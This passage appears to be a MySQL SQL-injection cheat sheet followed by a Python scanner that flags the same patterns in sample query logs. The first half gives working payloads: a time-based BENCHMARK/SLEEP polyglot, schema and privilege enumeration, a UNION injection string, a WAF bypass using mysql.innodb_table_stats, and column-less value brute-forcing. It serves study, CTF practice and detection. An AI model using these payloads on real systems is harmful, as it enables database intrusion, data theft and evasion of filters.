SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
Remember that in "modern" versions of MySQL you can substitute "information_schema.tables" with "mysql.innodb_table_stats" (this may be useful to bypass WAFs whose rules only match information_schema).
SELECT table_name FROM information_schema.tables WHERE table_schema=database(); # Get name of the tables
SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; # Get name of the columns of the table
SELECT <COLUMN1>, <COLUMN2> FROM <TABLE_NAME>; # Get values
SELECT user FROM mysql.user WHERE file_priv='Y'; # Users with file privileges
-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
Retrieving values without column names
If at some point you know the name of the table but not the names of its columns, you can try to find out how many columns it has by executing something like:
# When a True is returned, you have found the number of columns
select (select "", "") = (SELECT * from demo limit 1); # 2 columns
select (select "", "", "") < (SELECT * from demo limit 1); # 3 columns
Assuming there are 2 columns (the first being the ID) and the other one holds the flag, you can try to brute-force the content of the flag character by character:
# When True, you found the correct char and can start bruteforcing the next position
select (select 1, 'flaf') = (SELECT * from demo limit 1);
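As an added example (not part of the original page), a small Python scanner that applies the indicators described above to constructed MySQL query-log lines: the time-based BENCHMARK/SLEEP polyglot, the mysql.innodb_table_stats substitution that a filter matching only information_schema would miss, the file_priv lookup, and the column-less row-tuple comparison. The log format and rule names are assumptions.

```python
import re

# Constructed sample log lines (not from any real system), shaped like a MySQL
# general query log in which user-controlled input reached the query text.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z Query SELECT id,name FROM products WHERE id=42
2024-01-01T10:00:02Z Query SELECT * FROM some_table WHERE col="IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))"
2024-01-01T10:00:03Z Query SELECT id FROM t WHERE id=-1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
2024-01-01T10:00:04Z Query select (select "", "") = (SELECT * from demo limit 1)
2024-01-01T10:00:05Z Query SELECT user FROM mysql.user WHERE file_priv='Y'
"""

# Each rule: (name, compiled regex). Both the textbook metadata tables and the
# mysql.innodb_table_stats alternative are covered, because a rule that only
# looks for information_schema misses the substitution described above.
RULES = [
    ("time_based_blind", re.compile(r"\b(BENCHMARK|SLEEP)\s*\(", re.I)),
    ("version_probe", re.compile(r"@@version", re.I)),
    ("schema_enum", re.compile(
        r"\b(information_schema\.(tables|columns)|mysql\.innodb_table_stats)\b", re.I)),
    ("file_priv_users", re.compile(r"\bmysql\.user\b.*\bfile_priv\b", re.I)),
    # "(select ..., ...) = (SELECT * from <table> limit 1)" row-tuple comparison
    ("tuple_compare", re.compile(
        r"\(\s*select\s+[^()]*\)\s*[=<>]+\s*\(\s*select\s+\*\s+from\b", re.I)),
]


def classify_line(line):
    """Return the names of all rules that match one log line (in RULES order)."""
    return [name for name, rx in RULES if rx.search(line)]


def scan_log(text):
    """Return {line_number: [rule names]} for every line matching at least one rule."""
    hits = {}
    for n, line in enumerate(text.splitlines(), start=1):
        matched = classify_line(line)
        if matched:
            hits[n] = matched
    return hits


if __name__ == "__main__":
    for n, names in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(names)}")
```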